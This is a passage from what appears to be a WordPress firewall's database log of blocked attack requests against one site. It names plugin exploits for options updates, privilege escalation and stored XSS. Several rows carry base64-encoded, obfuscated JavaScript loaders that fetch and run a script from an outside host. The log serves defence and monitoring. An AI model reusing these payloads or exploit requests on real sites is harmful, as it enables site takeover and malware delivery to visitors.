Authentication','{\"learningMode\":0,\"failedRules\":\"137\",\"paramKey\":\"cmVxdWVzdC5ib2R5W25hbWVfb3B0aW9uc10=\",\"paramValue\":\"eXV6b19yZWxhdGVkX3Bvc3Q=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"auth-bypass\",\"ssl\":0}'),(37621,1569410941.975855,1569410941.023500,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=test',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37620,1569410943.748948,1569410942.876500,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37619,1569410948.913316,1569410948.175200,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=2',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37827,1569949903.168972,1569949902.075000,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37618,1569410951.575039,1569410949.803600,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=3',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37617,1569410954.220349,1569410953.341100,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=test',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37828,1569949896.415229,1569949894.836500,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=3',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37616,1569410956.057727,1569410955.127100,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37658,1569411562.063185,1569411550.612300,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?page=yuzo-related-post',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Related Posts <= 5.12.90 - Missing Authentication','{\"learningMode\":0,\"failedRules\":\"137\",\"paramKey\":\"cmVxdWVzdC5ib2R5W25hbWVfb3B0aW9uc10=\",\"paramValue\":\"eXV6b19yZWxhdGVkX3Bvc3Q=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"auth-bypass\",\"ssl\":0}'),(37615,1569410961.789152,1569410960.576700,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=2',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37614,1569410966.536365,1569410965.752500,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=3',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37657,1569411585.004701,1569411573.643900,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=test',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37613,1569411041.343999,1569411023.869300,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37612,1569410824.266437,1569410822.560800,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WooCommerce User Email Verification <= 3.3.0 - Unauthenticated Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"142\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3d1ZXZfZm9ybV90eXBlXQ==\",\"paramValue\":\"c2l0ZXVybA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"auth-bypass\",\"ssl\":0}'),(37820,1569949834.692769,1569949833.395600,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WooCommerce User Email Verification <= 3.3.0 - Unauthenticated Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"142\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3d1ZXZfZm9ybV90eXBlXQ==\",\"paramValue\":\"c2l0ZXVybA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"auth-bypass\",\"ssl\":0}'),(37821,1569949925.130103,1569949923.226500,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3NnY2dvb2dsZWFuYWx5dGljXQ==\",\"paramValue\":\"PHNjcmlwdCAgIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIGMgPSAwO3ZhciBfYWFhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWFhKi8sNTgvKl9hYWFhYWFhYSovLDQ3LypfYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhKi8sMTAzLypfYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYSovLDk3LypfYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYSovLDExNS8qKi8sNDYvKl9hYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYSovLDk4LypfYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYSovLDExOS8qKi8sOTcvKl9hYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWEqLywxMDQvKl9hYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYSovLDQ2LypfYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhYSovLDQ3LyoqLywxMDgvKl9hYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhYSovLDk3LypfYWFhYWFhYWEqLywxMDgvKiovLDQ3LyoqLyw5OS8qX2FhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYSovLDk3LypfYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYSovLDQ2LypfYWFhYWFhYWEqLywxMDYvKl9hYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYWEgPSBfYWFhYWFhYWEoX2FhYWFhYWFhKTtpZihfYWFhYWFhYWEubGVuZ3RoID4gMyl7X2FhYWFhYWFhKF9hYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYWEoX2FhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhYS5vcGVuKCBTdHJpbmcuZnJvbUNoYXJDb2RlKDcxLDY5LDg0KSwgX2FhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhYS5yZXNwb25zZVRleHQ7fWZ1bmN0aW9uIF9hYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWFhKDAsMCk7fTwvc2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37788,1569949698.130908,1569949695.580800,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37611,1569410828.341387,1569410825.274200,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?action=save&updated=true',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDExMi8qKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDQ3LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMDMvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sOTgvKiovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sOTgvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTAxLyoqLywxMTQvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDk5LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTExLyoqLyw5OS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWFhYWEpO2lmKF9hYWFhYWFhYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWFhYWEpeyB2YXIgX2FhYWFhYWFhYWFhYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWFhYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYWFhYWFhYWEsIGZhbHNlICk7X2FhYWFhYWFhYWFhYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWFhYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWFhYWFhYWFhKHRvZG8peyB2YXIgX2FhYWFhYWFhYWFhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYWFhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37789,1569949693.597722,1569949692.041800,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37610,1569410830.184187,1569410829.296300,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php?action=wcp_change_post_width',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3dpZHRoXQ==\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWFhYWFhYWFhYSovLDU4LypfYWFhYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYWFhYWFhYSovLDEwMy8qX2FhYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhYSovLDk4LypfYWFhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhYWFhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhYSovLDYzKTt2YXIgX2FhYWFhYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWFhYSk7aWYoX2FhYWFhYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYWFhYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYWFhYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhYWFhYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWFhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37823,1569949912.335249,1569949910.676600,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":0}'),(37609,1569410835.904106,1569410831.098100,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?Action=EWD_UFAQ_UpdateOptions',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWFhYSovLDU4LypfYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYSovLDEwMy8qX2FhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYSovLDk4LypfYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8q